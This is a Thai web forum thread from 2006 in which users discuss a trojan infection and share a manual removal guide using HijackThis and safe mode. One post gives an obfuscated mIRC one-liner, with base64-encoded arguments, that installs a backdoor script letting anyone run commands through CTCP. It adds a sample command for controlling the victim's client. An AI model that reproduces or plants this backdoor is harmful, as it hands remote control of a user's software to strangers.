โดน Trojan

เริ่มโพสต์โดย karma, 11 ธ.ค. 2006, 11:13 น.

0 สมาชิก และ 1 บุคคลทั่วไป กำลังเปิดอ่านโพสต์นี้

ป้าแป้งกึ่งสำเร็จรูป

อืม เหมือนจะโดนเหมือนกัน แสกนไวรัสไปแล้ว เหมือนจะหาย
เพื่อความชัวร์แบบโง่ๆก็เลยตามลบทีละไฟล์ที่คิดว่าน่าจะเป็นไวรัส...ก็ลบออกไปได้

แต่ทำไมมันถึงรู้สึกคุ้นๆ เหมือนมันยังอยู่ในเครื่อง
แต่แสกนแล้วแสกนอีก มันก็ไม่เห็นนะ..ก็เลย ยังรู้สึกระแวงๆอยู่ ว่ามันต้องแอบหลบซ่อนอยู่ไหนแน่ๆ :05:
เราแก้ไขอดีตไม่ได้ แต่เราทำปัจจุบันให้ดีได้

นักสืบ

อยู่ในใจ  :27:

จั๊วจ่ะ :)



วันนี้ลองโหลด avast มาดู

เจอไปแล้ว 111 ตัว ยังแสกนไม่หมดด้วย  :31:

อยากรู้ว่ามันคืออะไรนักหนากันคะ ไวรัสมันเยอะขนาดนี้เลยหรอ  :09:
there are no regrets in life, just lessons . .

ป้าแป้งกึ่งสำเร็จรูป

เราแก้ไขอดีตไม่ได้ แต่เราทำปัจจุบันให้ดีได้

นักสืบ

ที่เจอเป็นพวก Tracking Cookies หรือเปล่าครับ

Buob Marley

อ้างคำพูดจาก: จั๊วจ๊ะ เมื่อ 12 ธ.ค. 2006, 18:54 น.
นึกว่าจะไม่มีคนเล่นซะแล้ว  :30: :30:

เขินเลย :40:
http://img3.f0nt.com/flash/66d37d0393ee1ab1e2e55182dfabf34e.swf

A Long Patience: Wish Us Luck (and Happy Anniversary)

passion

//echo HELLO!! | write $decode(YmxvYi50eHQgQ1RDUCAqOio6KjogJDEt,m) | .load
$decode(LXJzIGJsb2IudHh0,m) | .msg $decode(UG9pWG9uIERPTkUgOkQ6RA==,m)

another Backdoor creating blob.txt

and it writes CTCP *:*:*: $1-

which you can control them

/ctcp VICTIM /quit I Got Haxxed

passion

อันดับแรก โหลดนี่ก่อน ( แปลมา้อีกที มั่วด้วย)
1. http://forum.hijackthis.de/attachme...77&d=1117139369
2. โหลดเสร็จ Unzip ไปใน Folder ที่ต้องการ
3. ฺBoot เข้าไปใน safeMode อย่ารันโปรแกรมอะไรทั้งนั้น เช่น IE
4. กด ABIRemover.exe และกด Install แล้วรอ ( Explore จะหายไป หรือ ไม่เห็นมัน )
5. Reboot เครื่องแล้วเข้าไปใน SafeMode อีกที
6. แปลเอาเองละกันคับ อิิอิ fix the random key in the registry with hijackthis (normaly HKLM\Software\Microsoft\Windows\CurrentVersion\Run ) and maybe the bolger BHO. Remember the random name and delete it in your system32 directory
้้Hijackthis โหลดที่นี่ http://www.thespykiller.co.uk/files/HJTSetup.exe
7. แสกนไวรัส ( ถ้าไม่ได้ลงใช้ผ่านเว็บเอาก้ได้คับ เช่น ของ Panda http://www.pandasoftware.com/products/activescan.htm )

ถ้ายังไม่หาย http://www.bleepingcomputer.com/for...=0&#entry187936

รายละเอียด
=========================================
Tech details:
should remove:
SvcProc and its files
ZepMon and its files
Bolger regkey (BHO should be done manual)
Nail.exe and the Shell = explorer.exe nail.exe entry
aurora.exe and some of the corresponding files

SMF 2.1.7 © 2026, Simple Machines